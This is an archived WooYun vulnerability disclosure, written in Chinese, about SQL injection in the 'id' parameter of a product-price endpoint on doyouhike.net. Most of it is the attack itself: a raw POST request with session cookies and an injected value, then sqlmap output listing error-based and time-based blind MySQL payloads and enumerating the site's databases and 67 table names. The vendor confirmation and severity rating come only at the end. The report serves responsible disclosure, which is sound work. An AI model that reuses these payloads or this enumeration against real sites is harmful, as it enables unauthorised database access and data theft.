乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-02: 厂商已经确认,细节仅向厂商公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
上面那个POST编辑错了,不好意思。
POST /dujia/product/price HTTP/1.1Content-Length: 99Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.doyouhike.net:80/Cookie: PHPSESSID=3s4c23cavdekl73caccl5tsn73; dyh_lastactivity=1441094989; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2259b0fe1b87c6586d1887a5231f7f7823%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22108.61.127.60%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1441093840%3B%7Df7258d5f059819ae0d4a3da2153cc48f; dyh_version=old; BAIDUID=B563E07E7FB4A8F497EC7BAC18231A40:FG=1; guid=a742-08e4-9593-4231; OAID=d42862cc581dffd429c54f3c67008240; u2=ed999103-87e3-434f-8936-1e2534f5dd4144C010Host: www.doyouhike.netConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*days=NaN&endtime=e&id=81%20AND%203*2*1%3d6%20AND%20872%3d872&num=e&property=564&starttime=undefined
sqlmap identified the following injection point(s) with a total of 1323 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT 6314 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(6314=6314,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- iisg21=6 AND 872=872&num=e&property=564&starttime=undefined Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))MAGS)-- yype21=6 AND 872=872&num=e&property=564&starttime=undefined---web server operating system: Windows 7back-end DBMS: MySQL 5.0sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT 6314 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(6314=6314,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- iisg21=6 AND 872=872&num=e&property=564&starttime=undefined Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))MAGS)-- yype21=6 AND 872=872&num=e&property=564&starttime=undefined---web server operating system: Windows 7back-end DBMS: MySQL 5.0current database: 'ezaitu_dive_fin'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT 6314 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(6314=6314,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- iisg21=6 AND 872=872&num=e&property=564&starttime=undefined Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))MAGS)-- yype21=6 AND 872=872&num=e&property=564&starttime=undefined---web server operating system: Windows 7back-end DBMS: MySQL 5.0available databases [6]:[*] ezaitu_dive_fin[*] ezaitu_jhapi_dev[*] ezaitu_race[*] ezaitu_wiki[*] ezaitu_yizhan[*] information_schemasqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT 6314 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(6314=6314,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- iisg21=6 AND 872=872&num=e&property=564&starttime=undefined Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: days=NaN&endtime=e&id=81 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))MAGS)-- yype21=6 AND 872=872&num=e&property=564&starttime=undefined---web server operating system: Windows 7back-end DBMS: MySQL 5.0Database: ezaitu_dive_fin[67 tables]+------------------------------+| ci_sessions || dili_attachments || dili_backend_settings || dili_cate_fields || dili_cate_models || dili_fieldtypes || dili_menus || dili_model_fields || dili_models || dili_plugins || dili_rights || dili_roles || dili_sessions || dili_site_settings || dili_u_access_rule || dili_u_admins || dili_u_authassignment || dili_u_authitem || dili_u_authitemchild || dili_u_c_areas || dili_u_c_article_categories || dili_u_c_cities || dili_u_c_countries || dili_u_c_districts || dili_u_c_im_categories || dili_u_c_orders || dili_u_c_position || dili_u_c_product_categories || dili_u_c_provinces || dili_u_c_shops || dili_u_groups || dili_u_m_ads || dili_u_m_article_replies || dili_u_m_articles || dili_u_m_comments || dili_u_m_currencies || dili_u_m_discount || dili_u_m_favorites || dili_u_m_galleries || dili_u_m_help_categories || dili_u_m_helps || dili_u_m_hotels || dili_u_m_ims || dili_u_m_joins || dili_u_m_logs || dili_u_m_mailcfg || dili_u_m_mails || dili_u_m_mailsendlist || dili_u_m_messages || dili_u_m_navigators || dili_u_m_order_logs || dili_u_m_order_products || dili_u_m_order_products_logs || dili_u_m_order_profiles || dili_u_m_order_profiles_logs || dili_u_m_pages || dili_u_m_product_auxiliary || dili_u_m_product_properties || dili_u_m_products || dili_u_m_products_recommend || dili_u_m_properties || dili_u_m_property_models || dili_u_m_tags || dili_u_m_users || dili_u_product_auxiliary || dili_u_user_menus || dili_validations |+------------------------------+
参数过滤
危害等级:中
漏洞Rank:10
确认时间:2015-09-02 13:24
已确认,参数过滤失当
暂无